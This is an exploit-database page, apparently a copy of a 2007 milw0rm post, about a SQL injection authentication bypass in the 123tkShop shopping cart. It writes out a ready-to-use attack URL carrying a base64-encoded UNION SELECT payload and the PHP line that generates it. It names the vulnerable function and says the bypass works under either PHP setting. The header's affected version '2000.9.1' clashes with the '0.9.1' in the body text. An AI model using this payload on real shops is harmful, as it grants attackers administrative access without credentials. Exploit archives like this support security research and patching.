header-logo
Suggest Exploit
vendor:
123tkShop
by:
Michael Brooks
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 123tkShop
Affected Version From: 2000.9.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

123tkShop SQL Injection Vulnerability

An attacker can gain Administrative rights with this authentication bypass exploit using a payload constructed with base64 encoding. The vulnerable code is in the ./123tkShop/shop/mainfile.php file in the is_admin function starting on line 156. The attack works regardless of the magic_quotes_gpc and register_globals settings. The exploit can be executed through the URL http://127.0.0.1/123tkShop/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk

Mitigation:

It is advised to use another shopping cart such as OsCommerce.
Source

Exploit-DB raw data:

By Michael Brooks
Vulnerability:Sql Injection 
Software:123tkShop
Homepage:http://sourceforge.net/projects/my123tkshop/
Affects Version 0.9.1. 

An attacker can gain Administrative rights with this authentication bypass exploit:
http://127.0.0.1/123tkShop/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
The payload for the attack is constructed like this:
print base64_encode("'union select 'password'/* :password");

Vulneralbe code is in the ./123tkShop/shop/mainfile.php file in the is_admin function starting on line 156

The attack will work magic_quotes_gpc=On or off because of base64_decode()
The attack will also work with register_globals=Off or On because of mainfile.php line 42:
if (!ini_get("register_globals")) {
    import_request_variables('GPC');
}
Registering globals is dangerous. 

My advice is to use another shopping cart such as OsCommerce. 

An interesting side note is that this url http://127.0.0.1/123tkShop/shop/admin.php?admin=%22 will produce a message:
"I don't like you..."
Interesting sentence,  unfortunately for 123tkShop sentences do not defend against sql injection. 

Merry Christmas. 

# milw0rm.com [2007-12-14]

Navigation

Suggest Exploit

Services By CQR